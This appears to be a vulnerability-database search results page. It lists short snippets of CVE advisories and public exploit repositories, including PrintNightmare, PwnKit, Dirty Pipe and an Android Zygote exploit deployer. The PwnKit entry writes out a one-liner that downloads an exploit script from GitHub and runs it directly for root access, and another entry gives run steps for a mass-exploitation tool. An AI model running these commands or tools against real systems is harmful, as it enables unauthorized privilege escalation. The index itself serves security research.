302932 matches found
CVE-2021-1675-PrintNightmare
CVE-2021-1675 - PrintNightmare LPE PowerShell Caleb Stewart | John Hammond | 2021年6月1日 CVE-2021-1675 は、"PrintNightmare" と呼ばれる重大なリモートコード実行およびローカル権限昇格の脆弱性です。 リモートコード実行機能の概念実証エクスプロイトが公開されています(Python、C++)。また、ローカル権限昇格用のC版もあります。私たちは純粋なPowerShellによるネイティブ実装を見たことがなく、エクスプロイトの改良と再構築に挑戦したいと考えました。...
CVE-2021-33739-POC
CVE-2021-26868 ローカル権限昇格 & CVE-2021-33739 概念実証...
CVE-2026-98116 ALSA: pcm: Serialize PCM mmap with buffer reallocation to fix page UAF
In the Linux kernel, the following vulnerability has been resolved: ALSA: pcm: Serialize PCM mmap with buffer reallocation to fix page UAF sndpcmhwparams and sndpcmhwfree guard buffer reallocation with an mmapcount check performed under the PCM stream lock, but the lock is released long before th...
CVE-2026-98116
The Linux kernel contains a page-level use-after-free vulnerability in the ALSA component. The issue arises because the PCM stream lock is released before the buffer is actually freed during reallocation, while snd_pcm_mmap_data() lacks any locking. This allows a concurrent mmap() call to slip in...
EUVD-2026-86947
In the Linux kernel, the following vulnerability has been resolved: ALSA: pcm: Serialize PCM mmap with buffer reallocation to fix page UAF sndpcmhwparams and sndpcmhwfree guard buffer reallocation with an mmapcount check performed under the PCM stream lock, but the lock is released long before th...
MSAPer
MSAPer | CVE-2023-3076 - MStore API 自动批量检测和利用 CVE-2023-3076 漏洞的工具 - MStore API install.sh sha1sum install.sh | grep 12345678 md5sum install.sh sha512sum install.sh bash install.sh 使用方法 请确保已安装 Parallel! 然后执行: git clone https://github.com/im-hanzou/MSAPer.git cd MSAPer && chmod +x msaper.sh Linux 或...
CVE-2023-37250-POC
CVE-2023-37250 PoC 解説記事: https://hackingiscool.pl/roaming-and-racing-to-get-system-cve-2023-37250/...
CVE-2019-13272
CVE-2019-13272 CVE-2019-13272 のエクスプロイト 脆弱性タイプ:Linux ローカル権限昇格 脆弱性の影響範囲:Linuxカーネルバージョン 5.1.17 未満 ローカルテスト環境: 脆弱性関連情報: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903...
PwnKit
PwnKit CVE-2021-4034 の自己完結型エクスプロイト - Pkexec ローカル特権昇格 使用方法 Ubuntu、Debian、Fedora、CentOS ベースの脆弱な Linux ディストリビューションでそのまま動作するはずです。 root@kitploit: sh -c "$curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh" 手動で root@kitploit: curl -fsSL...
CVE-2019-15511
CVE-2019-15511 向け GOG Galaxy エクスプロイト root@kitploit: usage: exploit.py -h --action LaunchElevatedRequest,FixDirectoryPrivilegesRequest,CreateDirectoryRequest,QueryProcessInfoRequest,InstallServiceRequest,DeleteServiceRequest,MoveAndVerifyGlobalDependencyRequest target positional arguments: target...
CVE-2023-34839
CVE-2023-34839 — Issabel PBX 4.0.0-6:CSRFによる権限昇格 目次 概要 脆弱性の詳細 影響を受けるソフトウェア CVSSスコア 攻撃シナリオ 概念実証(PoC) 再現手順 影響 対策 参考文献 免責事項 概要 CVE-2023-34839 は、広く使用されているオープンソースの統合コミュニケーションプラットフォーム Issabel PBX バージョン 4.0.0-6 で発見された...
CVE-2026-97602
The Linux kernel is vulnerable to a flaw where fqdir_pre_exit() flushes skbs from incomplete queues without updating their completion state. This allows a fragment to reuse stale reassembly metadata after a queue is cleared. In IPv6 , this can cause ip6_frag_reasm() to use an old nhoffset with a ...
EUVD-2026-86733
In the Linux kernel, the following vulnerability has been resolved: inet: frags: invalidate queues before flushing them fqdirpreexit flushes the skbs from incomplete queues without changing their completion state. A fragment which found a queue before highthresh was cleared can then acquire the...
CVE-2026-97602 inet: frags: invalidate queues before flushing them
In the Linux kernel, the following vulnerability has been resolved: inet: frags: invalidate queues before flushing them fqdirpreexit flushes the skbs from incomplete queues without changing their completion state. A fragment which found a queue before highthresh was cleared can then acquire the...
CVE-2026-97564
The Linux kernel contains a vulnerability in the SMB client where the cifs.idmap key type lacks a vet_description hook. This allows userspace to create keys via request_key(2) or add_key(2) containing authority-bearing fields (such as SIDs and uid/gid values) that are improperly treated as kernel...
CVE-2026-97564 smb: client: reject userspace cifs.idmap descriptions
In the Linux kernel, the following vulnerability has been resolved: smb: client: reject userspace cifs.idmap descriptions cifs.idmap key descriptions carry authority-bearing fields owner and group SIDs and uid/gid values in "os:"/"gs:"/"oi:"/"gi:" form that the cifs.idmap upcall helper treats as...
EUVD-2026-86872
In the Linux kernel, the following vulnerability has been resolved: smb: client: reject userspace cifs.idmap descriptions cifs.idmap key descriptions carry authority-bearing fields owner and group SIDs and uid/gid values in "os:"/"gs:"/"oi:"/"gi:" form that the cifs.idmap upcall helper treats as...
CVE-2021-4034
CVE-2021-4034 pkexec를 통한 로컬 권한 상승 ✨ YouTube 동영상 시청하기...
CVE-2022-0847
DIRTY PIPE CVE-2022-0847 这是一个内核漏洞,它允许覆盖任意只读文件中的数据,因此可能导致权限提升,因为非特权进程可以写入特权进程。所有功劳归于🥇Max Kellermann,感谢他发现该漏洞并提供出色的解释/描述。 👻 重要通知 此概念验证代码基于 Max Kellermann 的 PoC,并经过修改,以探索如何利用该漏洞获取更高权限的不同方式。该利用代码包含一项检查,用于检查内核版本是否易受攻击,并利用该漏洞覆盖 /etc/passwd 文件以获取 root 权限。exploit.c 用法 您可以下载已编译的二进制文件,或使用 make...
CVE-2024-31317-PoC-Deployer
CVE-2024-31317-PoC-Deployer Android 9 から 13 のデバイスを対象とした CVE-2024-31317 概念実証エクスプロイトのデプロイツールです。 📝 プロジェクト説明 CVE-2024-31317-PoC-Deployer は、CVE-2024-31317 の脆弱性を悪用するために必要なすべてのファイルをすばやく生成・設定する自動化デプロイスクリプトです。この脆弱性は Android 9 から 13 のデバイスに影響し、Zygote プロセスを介した権限昇格と任意のコード実行を可能にします。 🚨 脆弱性情報 CVE ID :...